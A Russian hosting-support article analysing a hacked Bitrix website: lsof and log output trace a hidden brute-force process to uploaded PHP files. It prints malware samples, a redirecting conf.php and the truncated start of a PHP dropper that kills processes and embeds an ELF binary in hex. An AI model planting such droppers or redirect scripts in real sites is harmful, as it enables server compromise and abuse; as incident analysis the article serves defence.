Поиск и устранение вредоносного кода на сайте. Брутфорс.

С сайта идет вредоносная активность (брутфорс)

На сервере появляется не понятный процесс

# ps auxf | grep host

medterra 32586 0.9 0.1 1059092 18860 ? Ssl May31 120:45 /usr/bin/host

Смотрим что за процесс и что он делает

 

# lsof -p 32586

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

host 32586 medterra cwd DIR 0,23 4096 78382962 /home/medterra/www/domain.com/bitrix/image_uploader

host 32586 medterra rtd DIR 0,23 4096 52592642 /

host 32586 medterra txt REG 0,23 69104 52887921 /usr/bin/host

host 32586 medterra mem REG 8,4 52609416 /lib/libnss_dns-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52609662 /lib/libnss_files-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 78383789 /home/medterra/www/domain.com/bitrix/image_uploader/.sd0 (path dev=0,23)

host 32586 medterra mem REG 8,4 52609427 /lib/libsepol.so.1 (path dev=0,23)

host 32586 medterra mem REG 8,4 52610195 /lib/libselinux.so.1 (path dev=0,23)

host 32586 medterra mem REG 8,4 52610359 /lib/libresolv-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52609444 /lib/libkeyutils-1.2.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52907368 /usr/lib/libkrb5support.so.0.1 (path dev=0,23)

host 32586 medterra mem REG 8,4 52609589 /lib/libcom_err.so.2.1 (path dev=0,23)

host 32586 medterra mem REG 8,4 52906965 /usr/lib/libk5crypto.so.3.1 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907331 /usr/lib/libkrb5.so.3.3 (path dev=0,23)

host 32586 medterra mem REG 8,4 52610421 /lib/libz.so.1.2.3 (path dev=0,23)

host 32586 medterra mem REG 8,4 52609508 /lib/libdl-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52609395 /lib/libc-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52609592 /lib/libpthread-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52609590 /lib/libnsl-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52907050 /usr/lib/libisccc.so.0.2.3 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907298 /usr/lib/libgssapi_krb5.so.2.2 (path dev=0,23)

host 32586 medterra mem REG 8,4 52609452 /lib/libcrypto.so.0.9.8e (path dev=0,23)

host 32586 medterra mem REG 8,4 52906930 /usr/lib/libisc.so.15.0.2 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907079 /usr/lib/libisccfg.so.1.0.10 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907328 /usr/lib/libbind9.so.0.0.11 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907223 /usr/lib/libdns.so.26.0.2 (path dev=0,23)

host 32586 medterra mem REG 8,4 52907074 /usr/lib/liblwres.so.9.2.0 (path dev=0,23)

host 32586 medterra mem REG 8,4 78383213 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/bruteforce.so (stat: No such file or directory)

host 32586 medterra mem REG 8,4 78383627 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/bruteforceng.so (stat: No such file or directory)

host 32586 medterra mem REG 8,4 78383214 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/libworker.so (stat: No such file or directory)

host 32586 medterra mem REG 8,4 52609404 /lib/ld-2.5.so (path dev=0,23)

host 32586 medterra mem REG 8,4 52887921 /usr/bin/host (path dev=0,23)

host 32586 medterra 0r CHR 1,3 20569 /dev/null

host 32586 medterra 1r CHR 1,3 20569 /dev/null

host 32586 medterra 2r CHR 1,3 20569 /dev/null

host 32586 medterra 3r CHR 1,3 20569 /dev/null

host 32586 medterra 4u IPv4 94870050 TCP ru101.activeby.net:55894->usve36472.startvps.com:http (ESTABLISHED)

host 32586 medterra 5u IPv4 94869892 TCP ru101.activeby.net:57093->apache2-kant.powerade.dreamhost.com:http (ESTABLISHED)

host 32586 medterra 6u IPv4 94869830 TCP ru101.activeby.net:44914->master.elitada.com:http (ESTABLISHED)

host 32586 medterra 7u IPv4 94869961 TCP ru101.activeby.net:38842->server213-171-219-5.livedns.org.uk:http (ESTABLISHED)

host 32586 medterra 8u IPv4 94870020 TCP ru101.activeby.net:48717->eagles171.ucg-core.com:http (ESTABLISHED)

host 32586 medterra 9u IPv4 94869858 TCP ru101.activeby.net:45914->cwhtor3.canadianwebhosting.com:http (ESTABLISHED)

host 32586 medterra 10u sock 0,5 94870164 can't identify protocol

host 32586 medterra 11u IPv4 94869842 TCP ru101.activeby.net:40070->alapaap.rebelpixel.com:http (ESTABLISHED)

host 32586 medterra 12u IPv4 94870147 TCP ru101.activeby.net:54579->w9c.rzone.de:http (ESTABLISHED)

host 32586 medterra 13u IPv4 94869944 TCP ru101.activeby.net:43147->110.4.46.35:http (ESTABLISHED)

host 32586 medterra 14u sock 0,5 94870136 can't identify protocol

host 32586 medterra 15u IPv4 94869674 TCP ru101.activeby.net:41497->web210.brainhost.com:http (SYN_SENT)

host 32586 medterra 16u IPv4 94870014 TCP ru101.activeby.net:38328->198-154-229-193.unifiedlayer.com:http (ESTABLISHED)

host 32586 medterra 17u IPv4 94869245 TCP ru101.activeby.net:42982->110.4.46.35:http (ESTABLISHED)

host 32586 medterra 18u IPv4 94870024 TCP ru101.activeby.net:54950->93-89-236-235.fbs.com.tr:http (ESTABLISHED)

host 32586 medterra 19u IPv4 94870105 TCP ru101.activeby.net:35590->ip-192-186-252-200.ip.secureserver.net:http (SYN_SENT)

host 32586 medterra 20u sock 0,5 94870144 can't identify protocol

host 32586 medterra 21u IPv4 94869723 TCP ru101.activeby.net:54484->w9c.rzone.de:http (ESTABLISHED)

host 32586 medterra 22u IPv4 94869964 TCP ru101.activeby.net:46886->goldenfast.net:http (ESTABLISHED)

# ll /proc/32586/

total 0

-r-------- 1 medterra medterra 0 Jun 9 04:22 auxv

-r--r--r-- 1 medterra medterra 0 Jun 9 04:21 cmdline

-rw-r--r-- 1 medterra medterra 0 Jun 9 04:22 coredump_filter

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 cpuset

lrwxrwxrwx 1 medterra medterra 0 Jun 9 04:22 cwd -> /home/medterra/www/domain.com/bitrix/image_uploader

-r-------- 1 medterra medterra 0 Jun 9 04:22 environ

lrwxrwxrwx 1 medterra medterra 0 Jun 9 04:22 exe -> /usr/bin/host

dr-x------ 2 medterra medterra 0 Jun 9 04:22 fd

dr-x------ 2 medterra medterra 0 Jun 9 04:22 fdinfo

-r-------- 1 medterra medterra 0 Jun 9 04:22 io

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 limits

-rw-r--r-- 1 medterra medterra 0 Jun 9 04:22 loginuid

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 maps

-rw------- 1 medterra medterra 0 Jun 9 04:22 mem

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 mounts

-r-------- 1 medterra medterra 0 Jun 9 04:22 mountstats

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 numa_maps

-rw-r--r-- 1 medterra medterra 0 Jun 9 04:22 oom_adj

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 oom_score

lrwxrwxrwx 1 medterra medterra 0 Jun 9 04:22 root -> /

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 schedstat

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 smaps

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 stack

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 stat

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 statm

-r--r--r-- 1 medterra medterra 0 Jun 9 04:17 status

dr-xr-xr-x 103 medterra medterra 0 Jun 9 04:22 task

-r--r--r-- 1 medterra medterra 0 Jun 9 04:22 wchan

 

 

Теперь разбираем что этот вывод означает =)

 

Путь к одному из файлов который используется для работы скрипта.

host 32586 medterra mem REG 8,4 78383789 /home/medterra/www/domain.com/bitrix/image_uploader/.sd0 (path dev=0,23)

Процесс оказывается хитрым так как скрывает свои следы файл /home/medterra/www/domain.com/bitrix/image_uploader/.sd0 оказывается бинарным и что он делает не понять.

 

Процесс оказывается еще более хитрым, строчка

host 32586 medterra mem REG 8,4 78383213 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/bruteforce.so (stat: No such file or directory)

Обозначает, что процесс для своей работы использует библиотеку:

/home/medterra/www/domain.com/bitrix/image_uploader/bruteforce.so

которая удалена.

Т.е.. Процесс запущенный из файла удаляет сами файлы, чтобы скрыть себя, при этом остается висеть в памяти сервера.

Тоже самое касается и файлов:

host 32586 medterra mem REG 8,4 78383627 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/bruteforceng.so (stat: No such file or directory)

host 32586 medterra mem REG 8,4 78383214 (deleted) /home/medterra/www/domain.com/bitrix/image_uploader/libworker.so (stat: No such file or directory)

По названию удаленных библиотек можно сделать вывод что процесс осуществляет bruteforce атаку, хотя это не обязательно.

 

Примеры строчек:

host 32586 medterra 4u IPv4 94870050 TCP ru101.activeby.net:55894->usve36472.startvps.com:http (ESTABLISHED)

обозначают что процесс устанавливает HTTP соединение с локального сервера ru101.activeby.net на удаленный хост usve36472.startvps.com

 

Строчки вида:

host 32586 medterra 15u IPv4 94869674 TCP ru101.activeby.net:41497->web210.brainhost.com:http (SYN_SENT)

обозначают, что процесс начинает отправлять SYN пакеты с на удаленный хост.

 

Множества различных соединений обозначает, что это действительно брутфорс атака.

 

Строчка:

lrwxrwxrwx 1 medterra medterra 0 Jun 9 04:22 cwd -> /home/medterra/www/domain.com/bitrix/image_uploader

показывает откуда был запущен процесс.

 

Начинаем разбирать, что же происходит на сайте.

заходим в директорию

/home/medterra/www/domain.com/bitrix/image_uploader

и выводим список всех файлов.

 

# ls -la

total 9164

drwxr-xr-x 7 medterra medterra 4096 Jun 5 20:22 .

drwxr-xr-x 21 medterra medterra 4096 May 31 15:25 ..

-rw-r--r-- 1 medterra medterra 102 Oct 26 2012 .htaccess

-rw-r--r-- 1 medterra medterra 12582912 Jun 5 20:22 .sd0

-rw-r--r-- 1 medterra medterra 1774225 Oct 26 2012 ImageUploader.cab

-rw-r--r-- 1 medterra medterra 916922 Oct 26 2012 ImageUploader.jar

-rw-r--r-- 1 medterra medterra 2195771 Oct 26 2012 ImageUploader7.cab

-rw-r--r-- 1 medterra medterra 1065538 Oct 26 2012 ImageUploader7.jar

-rw-r--r-- 1 medterra medterra 2454379 Oct 26 2012 ImageUploader7_x64.cab

drwxr-xr-x 2 medterra medterra 4096 Oct 26 2012 ImageUploaderFlashPHP

drwxr-xr-x 2 medterra medterra 4096 Oct 26 2012 ImageUploaderPHP

-rw-r--r-- 1 medterra medterra 26205 Oct 26 2012 aurigma.uploader.installationprogress.js

-rw-r--r-- 1 medterra medterra 228485 Oct 26 2012 aurigma.uploader.js

-rw-r--r-- 1 medterra medterra 1000 Oct 26 2012 bximageuploader.css

-rw-r--r-- 1 medterra medterra 13767 Oct 26 2012 bximageuploader.js

-rw-r--r-- 1 medterra medterra 239 May 25 21:19 conf.php

drwxr-xr-x 2 medterra medterra 4096 Oct 26 2012 flash

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 images

-rw-r--r-- 1 medterra medterra 62818 Oct 26 2012 iuembed.js

drwxr-xr-x 4 medterra medterra 4096 Oct 26 2012 lang

-rw-r--r-- 1 medterra medterra 10840 Oct 26 2012 localization.php

-rw-r--r-- 1 medterra medterra 218276 May 26 23:07 sears-atom.php

-rw-r--r-- 1 medterra medterra 88800 May 21 15:42 tppp.php

-rw-r--r-- 1 medterra medterra 606 Oct 26 2012 version.php

 

Становится ясно, что вирус попал на сайт через компонент Bitrix "image_uploader".

 

Продолжая анализ можно заметить что в этой директории все файлы за одну дату а всего лишь несколько за другую просмотрим содержимое.

Бросаются в глаза 3 файла за май месяц:

-rw-r--r-- 1 medterra medterra 218276 May 26 23:07 sears-atom.php

-rw-r--r-- 1 medterra medterra 88800 May 21 15:42 tppp.php

-rw-r--r-- 1 medterra medterra 239 May 25 21:19 conf.php

 

Просмотрел файл tppp.php можно заметить что в нем содержится уже известная вредоносная "функция eval(base64" с закодированными данными.

 

файл conf.php, в данном случае, содержит значение:

<?php

$t = isset($_GET['t'])?$_GET['t']:'';

if ($t==1)

header('Location: http://c.cpl2.ru/5YVe',true,301);

elseif ($t==2)

header('Location: http://bit.ly/1jPgirH',true,301);

else

header("HTTP/1.0 404 Not Found");

exit;

?>

По всей видимости это откуда берется вредоносный код.

 

 

Файл sears-atom.php содержит код вида:

<?php

 

header("Content-type: text/plain");

 

if (! function_exists('file_put_contents')) {

function file_put_contents($filename, $data) {

$f = @fopen($filename, 'w');

if (! $f)

return false;

$bytes = fwrite($f, $data);

fclose($f);

return $bytes;

}

}

 

@system("killall -9 ".basename("/usr/bin/host"));

 

$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\x48\x69\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x0f\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x60\x

...

?>

Становится ясно, что с этого файла и происходил первичный запуск вредоносного процесса.

 

Поиск по всему сайту файл за дату этих файлов результата не привел.

А вот выполнение в корне сайта команды:

# find ./ -name "*.php" | xargs grep "eval" --colo

Помогло повторно обнаружить файл ./bitrix/image_uploader/tppp.php =)

 

Анализ логов Веб-сервера на наличие POST запросов:

# cat ./domain.com.access.log | grep POST

184.82.179.101 - - [06/Nov/2013:05:47:52 +0400] "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 191 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" 35121

184.82.179.101 - - [06/Nov/2013:05:50:36 +0400] "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 191 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330" 27542

184.82.179.101 - - [06/Nov/2013:05:55:43 +0400] "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 191 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50" 34980

184.82.179.101 - - [06/Nov/2013:05:58:57 +0400] "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 191 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14" 26733

 

Из этого видно, что на сам сайт идет брутфорс, т.е. постоянно пытаются подобрать пароль к админке сайта.

 

Но нас интересует уже известный нас image_uploader, делаем выборку:

# cat ./domain.com.access.log | grep POST | grep upload

 

46.21.147.172 - - [26/May/2014:23:07:16 +0400] "POST /bitrix/image_uploader/tppp.php HTTP/1.0" 200 23938 "http://domian.com/bitrix/image_uploader/tppp.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50" 119821

5.133.179.250 - - [26/May/2014:23:16:41 +0400] "POST /bitrix/image_uploader/sears-atom.php HTTP/1.0" 200 59 "http://www.google.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1" 20138846

46.21.147.172 - - [27/May/2014:19:36:08 +0400] "POST /bitrix/image_uploader/tppp.php HTTP/1.0" 200 91609 "-" "Mozilla/5.0 (Windows NT 6.2; rv:24.0) Gecko/20100101 Firefox/24.0" 503871

46.21.147.172 - - [27/May/2014:19:36:09 +0400] "POST /bitrix/image_uploader/tppp.php HTTP/1.0" 200 9934 "-" "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20130406 Firefox/23.0" 154074

46.21.147.172 - - [29/May/2014:15:49:59 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_uploader HTTP/1.0" - - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 65327

46.21.147.172 - - [30/May/2014:14:17:20 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_uploader HTTP/1.0" 200 15561 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 46932762

46.21.147.172 - - [30/May/2014:14:29:48 +0400] "POST /bitrix/image_uploader/info.php HTTP/1.0" 404 4141 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" 435910

46.21.147.172 - - [30/May/2014:14:29:49 +0400] "POST /bitrix/image_uploader/info.php HTTP/1.0" 404 4141 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" 117163

46.21.147.172 - - [31/May/2014:15:25:30 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_up1loader HTTP/1.0" 302 - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 7315457

46.21.147.172 - - [31/May/2014:15:38:16 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_up1loader HTTP/1.0" 200 111452 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 262639

46.21.147.172 - - [31/May/2014:15:42:17 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_up1loader

 

 

Наблюдаем запрос к зараженному файлу:

46.21.147.172 - - [26/May/2014:23:07:16 +0400] "POST /bitrix/image_uploader/tppp.php HTTP/1.0" 200 23938 "http://domain.com/bitrix/image_uploader/tppp.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50" 119821

 

Очень интересный запрос, который показывает как файлы загружались:

46.21.147.172 - - [29/May/2014:15:49:59 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_uploader HTTP/1.0" - - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 65327

 

Доступ к /bitrix/admin/fileman_file_upload.php обозначает, что загрузка происходило через админку сайта, т.е. по всей видимости злоумышленникам удалось подобрать пароль от админки сайта.

 

 

запрос:

46.21.147.172 - - [30/May/2014:14:29:49 +0400] "POST /bitrix/image_uploader/info.php HTTP/1.0" 404 4141 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" 117163

Злоумышленник пытается обратиться к файлу которого нет.

 

Еще один интересный запрос:

46.21.147.172 - - [31/May/2014:15:38:16 +0400] "POST /bitrix/admin/fileman_file_upload.php?lang=ru&site=&path=%2Fbitrix%2Fimage_up1loader HTTP/1.0" 200 111452 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" 262639

Попытка загрузить файл в директорию image_up1loader

 

Подымаемся на одну директорию выше относительно /home/medterra/www/domain.com/bitrix/image_uploader т.е. в директорию

/home/medterra/www/domain.com/bitrix/

 

и выводим список файлов и директорий:

# ls -la

total 156

drwxr-xr-x 21 medterra medterra 4096 May 31 15:25 .

drwxr-x--x 16 medterra medterra 4096 May 31 14:17 ..

-rw-r--r-- 1 medterra medterra 30 Oct 26 2012 .access.php

drwxr-xr-x 3 medterra medterra 12288 Jan 10 2013 admin

drwxr-xr-x 3 medterra medterra 4096 Jan 10 2013 cache

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 components

-rw-r--r-- 1 medterra medterra 16753 Oct 26 2012 coupon_activation.php

-rw-r--r-- 1 medterra medterra 159 Oct 26 2012 footer.php

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 gadgets

-rw-r--r-- 1 medterra medterra 86 Oct 26 2012 header.php

drwxr-xr-x 9 medterra medterra 4096 Jun 8 18:07 html_pages

drwxr-xr-x 2 medterra medterra 4096 May 31 15:54 image_up1loader

drwxr-xr-x 7 medterra medterra 4096 Jun 5 20:22 image_uploader

drwxr-xr-x 7 medterra medterra 4096 Oct 26 2012 images

-rw-r--r-- 1 medterra medterra 83 Oct 26 2012 index.php

drwxr-xr-x 5 medterra medterra 4096 Oct 26 2012 js

-rw-r--r-- 1 medterra medterra 47 Oct 26 2012 license_key.php

drwxr-xr-x 3 medterra medterra 4096 Jun 9 05:36 managed_cache

drwxr-xr-x 6 medterra medterra 4096 Oct 26 2012 modules

-rw-r--r-- 1 medterra medterra 98 Oct 26 2012 p3p.xml

drwxr-xr-x 4 medterra medterra 4096 Jan 10 2013 panel

drwxr-xr-x 2 medterra medterra 4096 Oct 26 2012 php_interface

-rw-r--r-- 1 medterra medterra 74 Oct 26 2012 rss.php

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 sounds

-rw-r--r-- 1 medterra medterra 73 Oct 26 2012 spread.php

drwxr-xr-x 6 medterra medterra 4096 Oct 26 2012 templates

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 themes

drwxr-xr-x 2 medterra medterra 4096 Oct 26 2012 tools

drwxr-xr-x 2 medterra medterra 4096 Jan 10 2013 updates

-rw-r--r-- 1 medterra medterra 203 Oct 26 2012 urlrewrite.php

-rw-r--r-- 1 medterra medterra 3190 Oct 26 2012 virtual_file_system.php

-rw-r--r-- 1 medterra medterra 315 Oct 26 2012 web.config

drwxr-xr-x 3 medterra medterra 4096 Oct 26 2012 wizards

 

 

 

И находим 2 очень похожие директории

drwxr-xr-x 2 medterra medterra 4096 May 31 15:54 image_up1loader

drwxr-xr-x 7 medterra medterra 4096 Jun 5 20:22 image_uploader

 

Директория image_up1loader оказывается пустой.

 

Зачастую такие похожие директории или файлы маскируют, чтобы вредоносный код было сложнее найти.

 

ИТОГ

  • Сайт был взломан через подбор паролей к админке сайта
  • Все вредоносные файлы которые упоминаются в статье необходимо удалить.
  • Изменить все пароли. Пароль к FTP/SSH, пароль к пользователю Баз Данных, пароль в админку сайта.


Если решение вопроса найти не удалось, Вы можете отправить нам заявку:



(3 голос(а))
Эта статья помогла
Эта статья не помогла

Комментарии (0)